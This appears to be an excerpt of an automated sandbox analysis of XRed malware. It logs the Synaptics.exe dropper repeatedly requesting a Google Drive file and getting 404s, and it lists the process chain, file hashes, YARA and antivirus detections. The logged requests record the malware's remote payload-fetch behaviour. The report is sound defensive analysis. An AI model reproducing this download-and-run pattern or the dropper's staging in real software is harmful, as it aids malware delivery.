                                                                                                                    2025-01-07 12:18:38 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5
                                                                                                                    2025-01-07 12:18:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:38 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ykTR9wtCVJwjr5BUc7BF1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    30 | 192.168.2.11 | 49857 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:38 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5
                                                                                                                    2025-01-07 12:18:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:38 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3hdZZzS-NQyxmngF_XByMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    31 | 192.168.2.11 | 49862 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7R4eBZR9LgN6RPwahPjRarpIy04VerY33x6bBj7utr5fwLWPsDOwOXsKcezHrN6eIE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:39 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CpRBI0bq7Eq7tAqm-ob1YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="n9UqoUJyINaTFHjMYTiyRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:39 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    32 | 192.168.2.11 | 49864 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:39 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:39 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-x2f2UDegADc0vbEwCz7K5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    33 | 192.168.2.11 | 49863 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:39 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:39 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-gZPGKYEKmUOb7zlO9lM8sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    34 | 192.168.2.11 | 49865 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4UArBQRWaOSX10ZYVCB2aKb-ci0jVUSIxEGelZR2W-Iq6c3YNODJqUa2MBncSscMPV
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:39 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-j49NPYKZUvdIpdyOgMCfsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="ePE5Hp1YhzI9qx2NWLpBfA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:39 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    35 | 192.168.2.11 | 49878 | 142.250.186.161 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:46 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:47 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4BZWX2EUNKVtqtFtH2E7OxWAs1XcLLQi69P1f3kPTgQXgw1y1AEIvS4919Fq05lVmD
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:46 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Lu0ncRGZ_eoNCbHtbJfSmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:47 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:47 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="aG6Sa3gEqp-dxsR6uzFdiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:47 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    36 | 192.168.2.11 | 49877 | 142.250.185.110 | 443 | 2260 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2025-01-07 12:18:46 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:46 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GtYJ6q8ay7LneNPyvFFcVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Target ID:1
                                                                                                                    Start time:07:18:18
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\1.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\1.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'101'824 bytes
                                                                                                                    MD5 hash:D0598443FA9984227105811E5D89B70F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:07:18:19
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\._cache_1.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\._cache_1.exe"
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:329'728 bytes
                                                                                                                    MD5 hash:8F02CCF024090E3BD52574174749C778
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:07:18:20
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:772'096 bytes
                                                                                                                    MD5 hash:065BECDE24188ED65E53BECB09A5A039
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 87%, ReversingLabs
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:07:18:21
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0xc70000
                                                                                                                    File size:53'161'064 bytes
                                                                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:14
                                                                                                                    Start time:07:18:39
                                                                                                                    Start date:07/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 2816
                                                                                                                    Imagebase:0xd20000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:34.1%
                                                                                                                      Total number of Nodes:41
                                                                                                                      Total number of Limit Nodes:3

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004E8A84
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004E8A8E
                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004E8B76
                                                                                                                      • GetForegroundWindow.USER32 ref: 004E8B8B
                                                                                                                      • ExitProcess.KERNEL32 ref: 004E8D07
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmp
